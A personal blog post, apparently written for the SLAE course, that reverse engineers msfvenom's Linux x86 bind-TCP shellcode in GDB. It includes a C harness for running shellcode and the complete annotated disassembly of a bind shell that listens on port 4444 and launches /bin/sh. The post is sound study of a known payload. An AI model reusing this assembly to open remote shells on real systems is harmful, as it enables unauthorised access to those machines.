Hi there!

My shellcoding journey led me to the SLAE course, and now I am working on the assignments. The first two tasks cover basic shellcode writing: you have to write shellcode_bind_tcp and shellcode_reverse_tcp shellcodes.

Well, they are basic in comparison with other shellcoding topics, but they made me cry the first time I tried to write these shellcodes by myself :D

So, I asked myself - “Can I use someone else’s code to write my own?”.

I took GDB in my left hand and PEDA in my right, and dove into reverse engineering the msfvenom-generated linux/x86/shell_bind_tcp shellcode.

Bind TCP Shellcode

As I said before, I used an msfvenom-generated payload that opens the default port TCP/4444 and waits for an incoming connection.

If you want to repeat my whole workflow, you can use this shellcode:


Shellcode Execution

Well, in order to execute this shellcode I used simple code written in C:


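#include <stdio.h>
#include <string.h>
/* "\xcc" (INT 3) comes first; the msfvenom shellcode bytes follow it */
unsigned char shellcode[] = "\xcc";

int main() {
    printf("Shellcode Length: %d\n", (int)strlen((char *)shellcode));
    int (*ret)() = (int(*)())shellcode;
    ret();
}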

If you inspect this, you will probably notice that I placed a “\xcc” byte before the shellcode body. This is the opcode of the INT 3 instruction, which pauses execution when it is reached, just like a breakpoint.

Compile this C file with ‘gcc -fno-stack-protector -z execstack executor.c -o executor’

GDB Journey

Now we are ready to investigate our shellcode. If you open executor in gdb and enter ‘run’ command, you will see that execution stops on the INT 3 instruction:

EAX: 0x804a040 --> 0xf7db31cc 
EBX: 0xb7fc4ff4 --> 0x1a7d7c 
ECX: 0x0 
EDX: 0x0 
ESI: 0x0 
EDI: 0x804a056 --> 0x106a5c11 
EBP: 0xbffff368 --> 0x0 
ESP: 0xbffff32c --> 0x8048430 (<main+76>:	mov    edi,DWORD PTR [ebp-0x4])
EIP: 0x804a041 --> 0xe3f7db31
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
   0x804a03c <__dso_handle+24>:	add    BYTE PTR [eax],al
   0x804a03e <__dso_handle+26>:	add    BYTE PTR [eax],al
   0x804a040 <shellcode>:	int3   
=> 0x804a041 <shellcode+1>:	xor    ebx,ebx
   0x804a043 <shellcode+3>:	mul    ebx
   0x804a045 <shellcode+5>:	push   ebx
   0x804a046 <shellcode+6>:	inc    ebx
   0x804a047 <shellcode+7>:	push   ebx
0000| 0xbffff32c --> 0x8048430 (<main+76>:	mov    edi,DWORD PTR [ebp-0x4])
0004| 0xbffff330 --> 0x8048510 ("Shellcode Length: %d\n")
0008| 0xbffff334 --> 0x15 
0012| 0xbffff338 --> 0x8049ff4 --> 0x8049f28 --> 0x1 
0016| 0xbffff33c --> 0x8048461 (<__libc_csu_init+33>:	lea    eax,[ebx-0xe0])
0020| 0xbffff340 --> 0xffffffff 
0024| 0xbffff344 --> 0xb7e4fdd6 (add    ebx,0x17521e)
0028| 0xbffff348 --> 0xb7fc4ff4 --> 0x1a7d7c 
Legend: code, data, rodata, value
Stopped reason: SIGTRAP
0x0804a041 in shellcode ()

That is enough for us. Run the ‘disassemble’ command to get the disassembly of our shellcode.

Let’s split our disassembly into parts, one per int 0x80 call.

The First Part

Ok, if you have done things right, you will see something like this in the first part of your code. Disassembly:

0x0804a041 <+1>:	xor    ebx,ebx
0x0804a043 <+3>:	mul    ebx
0x0804a045 <+5>:	push   ebx
0x0804a046 <+6>:	inc    ebx
0x0804a047 <+7>:	push   ebx
0x0804a048 <+8>:	push   0x2
0x0804a04a <+10>:	mov    ecx,esp
0x0804a04c <+12>:	mov    al,0x66
0x0804a04e <+14>:	int    0x80

The instructions chosen by the shellcode author avoid 0x00 bytes in the shellcode, but they make our research harder. We only want to understand the main steps performed by this shellcode, so we don’t need to avoid 0x00 or other bad chars (I have written a simple XOR encoder for that). So, let’s convert this code to something more readable.

Rewritten Code:

push 0x00
push 0x01
push 0x02

mov eax, 0x66
mov ebx, 0x01
mov ecx, esp

int 0x80

I skipped the instructions that set our registers to zero, because they are common to almost every assembly program (‘xor ebx,ebx’ clears EBX, and ‘mul ebx’ then clears EAX and EDX).

Ok, what do we see here? The syscall with number 0x66 was called. I used a syscall table to look up syscalls by their numbers. For example, 0x66 is the number of SYS_SOCKETCALL.

SYS_SOCKETCALL requires the socketcall code to be loaded into EBX. In our case, EBX equals 0x01, which makes int 0x80 call SYS_SOCKET. Where did I find that? In the Linux sources.

This piece of the Linux kernel is very important for us, so I will paste it here:

#define SYS_SOCKET	1		/* sys_socket(2)		*/
#define SYS_BIND	2		/* sys_bind(2)			*/
#define SYS_CONNECT	3		/* sys_connect(2)		*/
#define SYS_LISTEN	4		/* sys_listen(2)		*/
#define SYS_ACCEPT	5		/* sys_accept(2)		*/
#define SYS_GETSOCKNAME	6		/* sys_getsockname(2)		*/
#define SYS_GETPEERNAME	7		/* sys_getpeername(2)		*/
#define SYS_SOCKETPAIR	8		/* sys_socketpair(2)		*/
#define SYS_SEND	9		/* sys_send(2)			*/
#define SYS_RECV	10		/* sys_recv(2)			*/
#define SYS_SENDTO	11		/* sys_sendto(2)		*/
#define SYS_RECVFROM	12		/* sys_recvfrom(2)		*/
#define SYS_SHUTDOWN	13		/* sys_shutdown(2)		*/
#define SYS_SETSOCKOPT	14		/* sys_setsockopt(2)		*/
#define SYS_GETSOCKOPT	15		/* sys_getsockopt(2)		*/
#define SYS_SENDMSG	16		/* sys_sendmsg(2)		*/
#define SYS_RECVMSG	17		/* sys_recvmsg(2)		*/
#define SYS_ACCEPT4	18		/* sys_accept4(2)		*/
#define SYS_RECVMMSG	19		/* sys_recvmmsg(2)		*/
#define SYS_SENDMMSG	20		/* sys_sendmmsg(2)		*/

Ok, but what about the values pushed onto the stack? I mean the first three lines of our code. Well, these are just the parameters for our SYS_SOCKETCALL calling SYS_SOCKET.

Run ‘man socket’ in your command shell and you will see this declaration: int socket(int domain, int type, int protocol);

So, our push instructions mean something like this:

push 0x00    ; protocol (IP)
push 0x01    ; type (SOCK_STREAM)
push 0x02    ; domain (AF_INET)

In short, the first part of our shellcode executes the call ‘socket(2, 1, 0)’.

The Second Part

Let’s start with the disassembly again.


0x0804a050 <+16>:	pop    ebx          
0x0804a051 <+17>:	pop    esi          
0x0804a052 <+18>:	push   edx          
0x0804a053 <+19>:	push   0x5c110002    
0x0804a058 <+24>:	push   0x10         
0x0804a05a <+26>:	push   ecx           
0x0804a05b <+27>:	push   eax
0x0804a05c <+28>:	mov    ecx,esp
0x0804a05e <+30>:	push   0x66
0x0804a060 <+32>:	pop    eax
0x0804a061 <+33>:	int    0x80

Let’s rewrite this piece of code.

Rewritten Code:

push dword 0x00
push word 0x5c11
push word 0x0002 

push dword 0x10        
push ecx          
push eax

mov eax, 0x66
mov ebx, 0x02
mov ecx, esp

int 0x80

Well, not as easy as the first part :D We can see the familiar int 0x80 interrupt with EAX equal to 0x66 (SYS_SOCKETCALL) and EBX equal to 0x02 (SYS_BIND).

Read ‘man bind’ and find the following declaration: ‘int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);’.

So, by the SYS_SOCKETCALL definition, EAX and EBX should store the syscall codes and ECX should point to the parameters. There is a strange struct in the bind() declaration - struct sockaddr - so I looked up the code of this structure. For IPv4 sockets the concrete type is struct sockaddr_in.

Here is the code for this struct:

struct sockaddr_in {
    short            sin_family;   // e.g. AF_INET, AF_INET6
    unsigned short   sin_port;     // e.g. htons(3490)
    struct in_addr   sin_addr;     // see struct in_addr, below
    char             sin_zero[8];  // zero this if you want to
};

It is not so hard to find the corresponding instructions in the rewritten code:

push dword 0x00  ; sin_addr
push word 0x5c11 ; sin_port
push word 0x0002 ; sin_family

Here 0x5c11 is the TCP port used by this shellcode, and 0x0002 is AF_INET. If you convert 0x5c11 to decimal, you will see a strange number (23569). Obviously, this is not the port number in the usual sense. Network protocols use big-endian byte order instead of the little-endian order of our x86 machine. To convert 0x5c11 to the port number, you should swap the bytes - dec(0x115c) = 4444.

The ‘sin_addr’ field equals zero, which means that the port will be opened on 0.0.0.0, i.e. on all interfaces.

What about the next three lines in our rewritten disassembly? I mean this:

push dword 0x10
push ecx
push eax

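Well, this works like magic, but ECX at this step points to our ‘sockaddr’ structure. The trick is in the original disassembly: the two pops free 8 bytes of stack, and ‘push edx’ plus ‘push 0x5c110002’ fill exactly those 8 bytes again, so ESP returns to the address that ECX has held since the first part. Together these lines form all the params of the bind() function: 0x10 is the length of our sockaddr structure and EAX stores the socket descriptor.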

Going next!

The Third Part


0x0804a063 <+35>:	mov    DWORD PTR [ecx+0x4],eax
0x0804a066 <+38>:	mov    bl,0x4
0x0804a068 <+40>:	mov    al,0x66
0x0804a06a <+42>:	int    0x80

Oh, no rewriting needed at last!

EAX still equals 0x66 and EBX equals 0x4. That gives us the SYS_LISTEN call with the declaration ‘int listen(int sockfd, int backlog);’.

At the int 0x80 step our stack looks like this:

0000| 0xbffff314 --> 0x7 
0004| 0xbffff318 --> 0x0 
0008| 0xbffff31c --> 0x10 
0012| 0xbffff320 --> 0x5c110002 
0016| 0xbffff324 --> 0x0 
0020| 0xbffff328 --> 0x0 
0024| 0xbffff32c --> 0x8048430 (<main+76>:	mov    edi,DWORD PTR [ebp-0x4])
0028| 0xbffff330 --> 0x8048510 ("Shellcode Length: %d\n")

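You can see the 0x7 (int sockfd) and 0x0 (int backlog) values on the top. The backlog slot used to hold the pointer to our sockaddr structure; ‘mov DWORD PTR [ecx+0x4],eax’ overwrote it with the 0 that bind() returned in EAX. ECX still points to the top of the stack, so the ECX value doesn’t need to change.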

The Fourth Part


0x0804a06c <+44>:	inc    ebx
0x0804a06d <+45>:	mov    al,0x66
0x0804a06f <+47>:	int    0x80

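Ok, we remember that EBX equals 0x4. The first instruction increments it, so int 0x80 will perform the SYS_ACCEPT socketcall here. ECX is untouched, so the arguments are read from the same stack block: the sockfd, followed by a NULL address pointer.

Here is a small quote from the man page: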

The accept() system call is used with connection-based socket types (SOCK_STREAM, SOCK_SEQPACKET). It extracts the first connection request on the queue of pending connections for the listening socket, sockfd, creates a new connected socket, and returns a new file descriptor referring to that socket. The newly created socket is not in the listening state. The original socket sockfd is unaffected by this call.

The argument sockfd is a socket that has been created with socket(2), bound to a local address with bind(2), and is listening for connections after a listen(2).

The Fifth Part


0x0804a071 <+49>:	xchg   ebx,eax
0x0804a072 <+50>:	pop    ecx
0x0804a073 <+51>:	push   0x3f
0x0804a075 <+53>:	pop    eax
0x0804a076 <+54>:	int    0x80
0x0804a078 <+56>:	dec    ecx
0x0804a079 <+57>:	jns    0x804a073 <shellcode+51>

Ok. Again, before the int 0x80 call, EAX equals 0x3f, which means the SYS_DUP2 syscall. It has the following declaration - ‘int dup2(int oldfd, int newfd);’.

Dup2 makes newfd refer to the same open file as oldfd. In this case, EBX holds oldfd (the descriptor returned by accept(), moved there by xchg) and ECX holds newfd, the descriptor being redirected (in the end STDERR, STDOUT and STDIN).

The jns instruction creates a loop: ‘pop ecx’ loads the listening socket descriptor from the top of the stack (0x7 in the dump above), and ‘dec ecx’ counts it down until it goes negative. On the way down, every descriptor from that value to 0, including STDERR, STDOUT and STDIN, becomes redirected to our accept() descriptor.

From my point of view, this is the most interesting part of this shellcode. It is what lets us send commands to the command shell and receive results and errors.

The Sixth Part


0x0804a07b <+59>:	push   0x68732f2f
0x0804a080 <+64>:	push   0x6e69622f
0x0804a085 <+69>:	mov    ebx,esp
0x0804a087 <+71>:	push   eax
0x0804a088 <+72>:	push   ebx
0x0804a089 <+73>:	mov    ecx,esp
0x0804a08b <+75>:	mov    al,0xb
0x0804a08d <+77>:	int    0x80
0x0804a08f <+79>:	add    BYTE PTR [eax],al

What are the 0x68732f2f and 0x6e69622f numbers? Look at the character codes and you will see that the first two pushes are equivalent to the following construction:

push 'hs//'
push 'nib/'

Next, the pointer to ‘/bin//sh’ is placed into EBX. We don’t need to manually place a 0x00 byte at the end of this string because a zero dword already sits on the top of the stack.

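EAX stores the code 0xb, which makes the int 0x80 interrupt a SYS_EXECVE call. EBX points to the path, ECX points to the argv array built by ‘push eax’ and ‘push ebx’ (the string pointer followed by a NULL, since EAX is 0 after the last dup2), and EDX is still zero.

This part is responsible for command execution in this bind shell. After the dup2 calls, it launches the /bin/sh interpreter and allows us to execute commands on the remote machine.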


As you can see, even such a simple payload has at least six logical parts.

Reversing more complex shellcodes like reverse tcp or reverse https (oh, god!) will be my headache for the next few weeks, and I will try to publish all my results. After that, I believe, I will be able to successfully finish the SLAE assignments.

If you have any questions, feel free to comment on this post or write to me directly.

Good Luck!

The end